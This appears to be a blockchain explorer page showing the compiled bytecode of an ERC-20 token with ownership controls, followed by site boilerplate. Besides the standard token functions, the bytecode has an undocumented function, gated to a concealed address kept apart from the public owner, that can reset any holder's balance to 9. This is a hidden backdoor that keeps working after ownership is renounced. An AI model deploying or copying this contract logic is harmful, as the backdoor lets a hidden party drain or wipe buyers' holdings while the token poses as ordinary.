f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ee90611452565b60405180910390fd5b6108048286868403610a87565b60019250505092915050565b60008061081b610a7f565b9050610828818585610cdb565b600191505092915050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c1610a7f565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610950576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610947906113c0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b6906114e4565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aed90611576565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5c90611608565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c4291906111a2565b60405180910390a3505050565b6000610c5b8484610833565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cd55781811015610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611674565b60405180910390fd5b610cd48484848403610a87565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4190611706565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db090611798565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e379061182a565b60405180910390fd5b8181610e4c919061184a565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610ee182600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8191906111a2565b60405180910390a350505050565b60008183610f9d9190611340565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fdf578082015181840152602081019050610fc4565b60008484015250505050565b6000601f19601f8301169050919050565b600061100782610fa5565b6110118185610fb0565b9350611021818560208601610fc1565b61102a81610feb565b840191505092915050565b6000602082019050818103600083015261104f8184610ffc565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110878261105c565b9050919050565b6110978161107c565b81146110a257600080fd5b50565b6000813590506110b48161108e565b92915050565b6000819050919050565b6110cd816110ba565b81146110d857600080fd5b50565b6000813590506110ea816110c4565b92915050565b6000806040838503121561110757611106611057565b5b6000611115858286016110a5565b9250506020611126858286016110db565b9150509250929050565b60008115159050919050565b61114581611130565b82525050565b6000602082019050611160600083018461113c565b92915050565b60006020828403121561117c5761117b611057565b5b600061118a848285016110a5565b91505092915050565b61119c816110ba565b82525050565b60006020820190506111b76000830184611193565b92915050565b6000806000606084860312156111d6576111d5611057565b5b60006111e4868287016110a5565b93505060206111f5868287016110a5565b9250506040611206868287016110db565b9150509250925092565b600060ff82169050919050565b61122681611210565b82525050565b6000602082019050611241600083018461121d565b92915050565b6112508161107c565b82525050565b600060208201905061126b6000830184611247565b92915050565b6000806040838503121561128857611287611057565b5b6000611296858286016110a5565b92505060206112a7858286016110a5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f857607f821691505b60208210810361130b5761130a6112b1565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061134b826110ba565b9150611356836110ba565b925082820190508082111561136e5761136d611311565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113aa602083610fb0565b91506113b582611374565b602082019050919050565b600060208201905081810360008301526113d98161139d565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061143c602583610fb0565b9150611447826113e0565b604082019050919050565b6000602082019050818103600083015261146b8161142f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114ce602683610fb0565b91506114d982611472565b604082019050919050565b600060208201905081810360008301526114fd816114c1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611560602483610fb0565b915061156b82611504565b604082019050919050565b6000602082019050818103600083015261158f81611553565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115f2602283610fb0565b91506115fd82611596565b604082019050919050565b60006020820190508181036000830152611621816115e5565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061165e601d83610fb0565b915061166982611628565b602082019050919050565b6000602082019050818103600083015261168d81611651565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116f0602583610fb0565b91506116fb82611694565b604082019050919050565b6000602082019050818103600083015261171f816116e3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611782602383610fb0565b915061178d82611726565b604082019050919050565b600060208201905081810360008301526117b181611775565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611814602683610fb0565b915061181f826117b8565b604082019050919050565b6000602082019050818103600083015261184381611807565b9050919050565b6000611855826110ba565b9150611860836110ba565b925082820390508181111561187857611877611311565b5b9291505056fea264697066735822122053bdda0e7fa7021a935183aa690fa1eba347331a94b2b3f857923298afc6a81e64736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b806370a0823114610200578063715018a6146102305780638da5cb5b1461023a57806395d89b4114610258576100f5565b806318160ddd116100d357806318160ddd1461016457806323b872dd14610182578063313ce567146101b257806339509351146101d0576100f5565b806306fdde03146100fa578063095ea7b314610118578063180d45d014610148575b600080fd5b610102610322565b60405161010f9190611035565b60405180910390f35b610132600480360381019061012d91906110f0565b6103b4565b60405161013f919061114b565b60405180910390f35b610162600480360381019061015d9190611166565b6103d7565b005b61016c6104c3565b60405161017991906111a2565b60405180910390f35b61019c600480360381019061019791906111bd565b6104cd565b6040516101a9919061114b565b60405180910390f35b6101ba6104fc565b6040516101c7919061122c565b60405180910390f35b6101ea60048036038101906101e591906110f0565b610505565b6040516101f7919061114b565b60405180910390f35b61021a60048036038101906102159190611166565b61053c565b60405161022791906111a2565b60405180910390f35b610238610585565b005b6102426106dd565b60405161024f9190611256565b60405180910390f35b610260610707565b60405161026d9190611035565b60405180910390f35b610290600480360381019061028b91906110f0565b610799565b60405161029d919061114b565b60405180910390f35b6102c060048036038101906102bb91906110f0565b610810565b6040516102cd919061114b565b60405180910390f35b6102f060048036038101906102eb9190611271565b610833565b6040516102fd91906111a2565b60405180910390f35b610320600480360381019061031b9190611166565b6108b9565b005b606060028054610331906112e0565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112e0565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a7f565b90506103cc818585610a87565b600191505092915050565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047157600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461047d565b6104796104fc565b60ff165b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600854905090565b6000806104d8610a7f565b90506104e5858285610c4f565b6104f0858585610cdb565b60019150509392505050565b60006009905090565b600080610510610a7f565b90506105318185856105228589610833565b61052c9190611340565b610a87565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61058d610a7f565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461061c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610613906113c0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610716906112e0565b80601f0160208091040260200160405190810160405280929190818152602001828054610742906112e0565b801561078f5780601f106107645761010080835404028352916020019161078f565b820191906000526020600020905b81548152906001019060200180831161077257829003601f168201915b5050505050905090565b6000806107a4610a7f565b905060006107b28286610833565b9050838110156107f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ee90611452565b60405180910390fd5b6108048286868403610a87565b60019250505092915050565b60008061081b610a7f565b9050610828818585610cdb565b600191505092915050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c1610a7f565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610950576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610947906113c0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b6906114e4565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aed90611576565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5c90611608565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c4291906111a2565b60405180910390a3505050565b6000610c5b8484610833565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cd55781811015610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611674565b60405180910390fd5b610cd48484848403610a87565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4190611706565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db090611798565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e379061182a565b60405180910390fd5b8181610e4c919061184a565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610ee182600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8f90919063ffffffff16565b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8191906111a2565b60405180910390a350505050565b60008183610f9d9190611340565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fdf578082015181840152602081019050610fc4565b60008484015250505050565b6000601f19601f8301169050919050565b600061100782610fa5565b6110118185610fb0565b9350611021818560208601610fc1565b61102a81610feb565b840191505092915050565b6000602082019050818103600083015261104f8184610ffc565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110878261105c565b9050919050565b6110978161107c565b81146110a257600080fd5b50565b6000813590506110b48161108e565b92915050565b6000819050919050565b6110cd816110ba565b81146110d857600080fd5b50565b6000813590506110ea816110c4565b92915050565b6000806040838503121561110757611106611057565b5b6000611115858286016110a5565b9250506020611126858286016110db565b9150509250929050565b60008115159050919050565b61114581611130565b82525050565b6000602082019050611160600083018461113c565b92915050565b60006020828403121561117c5761117b611057565b5b600061118a848285016110a5565b91505092915050565b61119c816110ba565b82525050565b60006020820190506111b76000830184611193565b92915050565b6000806000606084860312156111d6576111d5611057565b5b60006111e4868287016110a5565b93505060206111f5868287016110a5565b9250506040611206868287016110db565b9150509250925092565b600060ff82169050919050565b61122681611210565b82525050565b6000602082019050611241600083018461121d565b92915050565b6112508161107c565b82525050565b600060208201905061126b6000830184611247565b92915050565b6000806040838503121561128857611287611057565b5b6000611296858286016110a5565b92505060206112a7858286016110a5565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f857607f821691505b60208210810361130b5761130a6112b1565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061134b826110ba565b9150611356836110ba565b925082820190508082111561136e5761136d611311565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113aa602083610fb0565b91506113b582611374565b602082019050919050565b600060208201905081810360008301526113d98161139d565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061143c602583610fb0565b9150611447826113e0565b604082019050919050565b6000602082019050818103600083015261146b8161142f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114ce602683610fb0565b91506114d982611472565b604082019050919050565b600060208201905081810360008301526114fd816114c1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611560602483610fb0565b915061156b82611504565b604082019050919050565b6000602082019050818103600083015261158f81611553565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115f2602283610fb0565b91506115fd82611596565b604082019050919050565b60006020820190508181036000830152611621816115e5565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061165e601d83610fb0565b915061166982611628565b602082019050919050565b6000602082019050818103600083015261168d81611651565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116f0602583610fb0565b91506116fb82611694565b604082019050919050565b6000602082019050818103600083015261171f816116e3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611782602383610fb0565b915061178d82611726565b604082019050919050565b600060208201905081810360008301526117b181611775565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611814602683610fb0565b915061181f826117b8565b604082019050919050565b6000602082019050818103600083015261184381611807565b9050919050565b6000611855826110ba565b9150611860836110ba565b925082820390508181111561187857611877611311565b5b9291505056fea264697066735822122053bdda0e7fa7021a935183aa690fa1eba347331a94b2b3f857923298afc6a81e64736f6c63430008130033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.